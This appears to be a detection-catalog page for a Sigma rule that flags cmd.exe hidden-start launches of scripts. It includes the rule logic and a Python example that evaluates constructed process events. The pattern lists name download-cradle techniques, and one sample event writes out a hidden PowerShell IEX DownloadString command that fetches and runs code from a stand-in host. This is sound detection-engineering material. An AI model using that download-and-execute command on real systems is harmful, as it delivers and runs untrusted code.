LoFP / legitimate administrative scripts running from temporary folders.

Techniques

Sample rules

Cmd Launched with Hidden Start Flags to Suspicious Targets

Description

Detects cmd.exe launching a target through the built-in "start" command with the "/b" (no new window) or "/min" (minimized window) switch; the windash modifier also covers the dash spelling of those switches. Hidden-start launches on their own are common in legitimate background tasks, so the rule only fires when the command line additionally carries a script-type extension (.bat, .cmd, .vbs, .ps1, .hta and similar), a suspicious pattern such as PowerShell's -nop, -noni, -w hidden or a DownloadString( / DownloadFile( call, or a path under a temporary, public or user-profile directory. Legitimate administrative scripts started this way from temporary folders, the false positive this page catalogs, will match as well. This technique was observed in Chaos, DarkSide, and Emotet malware campaigns.

Detection logic

selection_cmd_img:
  - Image|endswith: \cmd.exe
  - OriginalFileName: Cmd.Exe
selection_cmd_hidden_start_1:
  CommandLine|contains|windash:
  - 'start '
  - start/b
  - start/min
selection_cmd_hidden_start_2:
  CommandLine|contains|windash:
  - '/b '
  - /b"
  - '/min '
  - /min"
selection_cli_susp_extension:
  CommandLine|contains:
  - .bat
  - .cmd
  - .cpl
  - .hta
  - .js
  - .ps1
  - .scr
  - .vbe
  - .vbs
selection_cli_susp_pattern:
  CommandLine|contains:
  - ' -nop '
  - ' -sta '
  - .downloadfile(
  - .downloadstring(
  - '-noni '
  - '-w hidden '
selection_cli_uncommon_location:
  CommandLine|contains:
  - :\Perflogs\
  - :\Temp\
  - :\Users\Default\
  - :\Windows\Temp\
  - \AppData\Roaming\
  - \Contacts\
  - \Documents\
  - \Downloads\
  - \Favorites\
  - \Favourites\
  - \inetpub\
  - \Music\
  - \Photos\
  - \Temporary Internet\
  - \Users\Public\
  - \Videos\
condition: all of selection_cmd_* and 1 of selection_cli_*
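To see how the selections combine, the following is an added example written for this page, not code from the Sigma rule or any Sigma backend. It applies the rule's string lists to five constructed process-creation events (field names follow Sysmon Event ID 1; the user name bob, the paths and the example.invalid URL are made up), approximates the windash modifier by also matching the dash spelling of each switch, and shows that hidden-start flags alone do not fire, that the page's false positive (an administrative batch file under C:\Windows\Temp) does, and that a non-cmd.exe process is excluded by selection_cmd_img.

```python
"""Added example: evaluate the selections of 'Cmd Launched with Hidden Start
Flags to Suspicious Targets' over constructed process-creation events.
Illustration code written for this page, not Sigma's matching engine; the
events below are made up, not captured telemetry."""

# String lists copied from the rule's detection logic.
SUSP_EXTENSION = [".bat", ".cmd", ".cpl", ".hta", ".js", ".ps1", ".scr", ".vbe", ".vbs"]
SUSP_PATTERN = [" -nop ", " -sta ", ".downloadfile(", ".downloadstring(",
                "-noni ", "-w hidden "]
UNCOMMON_LOCATION = [
    ":\\Perflogs\\", ":\\Temp\\", ":\\Users\\Default\\", ":\\Windows\\Temp\\",
    "\\AppData\\Roaming\\", "\\Contacts\\", "\\Documents\\", "\\Downloads\\",
    "\\Favorites\\", "\\Favourites\\", "\\inetpub\\", "\\Music\\", "\\Photos\\",
    "\\Temporary Internet\\", "\\Users\\Public\\", "\\Videos\\",
]
HIDDEN_START_1 = ["start ", "start/b", "start/min"]   # |windash in the rule
HIDDEN_START_2 = ["/b ", '/b"', "/min ", '/min"']     # |windash in the rule


def windash_variants(value):
    """Approximation of Sigma's windash modifier: match the pattern as written
    and with its switch character swapped between '/' and '-'. The real
    modifier enumerates every per-switch permutation; the single-switch
    patterns in this rule only need the two spellings."""
    return {value, value.replace("/", "-"), value.replace("-", "/")}


def contains_any(haystack, needles, windash=False):
    """Sigma 'contains' is case-insensitive substring matching."""
    hay = haystack.lower()
    for needle in needles:
        variants = windash_variants(needle) if windash else {needle}
        if any(v.lower() in hay for v in variants):
            return True
    return False


def evaluate(event):
    """Apply 'all of selection_cmd_* and 1 of selection_cli_*'.
    Returns (matched, names of the selection_cli_* groups that hit)."""
    image = event.get("Image", "")
    original = event.get("OriginalFileName", "")
    cli = event.get("CommandLine", "")

    # selection_cmd_img is a list of maps: Image OR OriginalFileName.
    cmd_img = image.lower().endswith("\\cmd.exe") or original.lower() == "cmd.exe"
    cmd_start = (contains_any(cli, HIDDEN_START_1, windash=True)
                 and contains_any(cli, HIDDEN_START_2, windash=True))

    cli_groups = (("susp_extension", SUSP_EXTENSION),
                  ("susp_pattern", SUSP_PATTERN),
                  ("uncommon_location", UNCOMMON_LOCATION))
    hits = [name for name, needles in cli_groups if contains_any(cli, needles)]

    return (cmd_img and cmd_start and len(hits) >= 1), hits


CMD = "C:\\Windows\\System32\\cmd.exe"
# Constructed sample events (not real telemetry); fields follow Sysmon EID 1.
EVENTS = [
    # Script dropped under the roaming profile, launched with no window.
    {"Image": CMD, "OriginalFileName": "Cmd.Exe",
     "CommandLine": 'cmd.exe /c start /b "" "C:\\Users\\bob\\AppData\\Roaming\\Update\\run.vbs"'},
    # Minimized PowerShell downloader: no script extension and no odd path,
    # so the -nop / -w hidden / DownloadString( patterns carry the match.
    {"Image": CMD, "OriginalFileName": "Cmd.Exe",
     "CommandLine": "cmd.exe /c START /MIN powershell -nop -w hidden -c "
                    "\"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')\""},
    # Ordinary background launch of an installed binary: hidden-start flags
    # alone are not enough, so this does not fire.
    {"Image": CMD, "OriginalFileName": "Cmd.Exe",
     "CommandLine": 'cmd.exe /c start /b "C:\\Program Files\\Vendor\\agent.exe" --service'},
    # The page's false positive: an admin batch file run from a temp folder.
    {"Image": CMD, "OriginalFileName": "Cmd.Exe",
     "CommandLine": "cmd.exe /c start /min C:\\Windows\\Temp\\hotfix\\apply.bat"},
    # Same flags and target, but the process is not cmd.exe: selection_cmd_img
    # fails, so the condition fails despite the selection_cli_* hits.
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "OriginalFileName": "PowerShell.EXE",
     "CommandLine": 'powershell.exe -c "start /b C:\\Users\\Public\\x.bat"'},
]


def run_all(events=EVENTS):
    """Evaluate every event; returns a list of (matched, hits) tuples."""
    return [evaluate(e) for e in events]


if __name__ == "__main__":
    for event, (matched, hits) in zip(EVENTS, run_all()):
        print("MATCH " if matched else "no    ", hits, event["CommandLine"][:70])
```

The fourth event is the point of this LoFP entry: a scheduled or manually run administrative batch file under C:\Windows\Temp satisfies both selection_cli_susp_extension and selection_cli_uncommon_location, so tuning has to come from the environment (known script paths, the launching user or parent process), not from the rule's string lists.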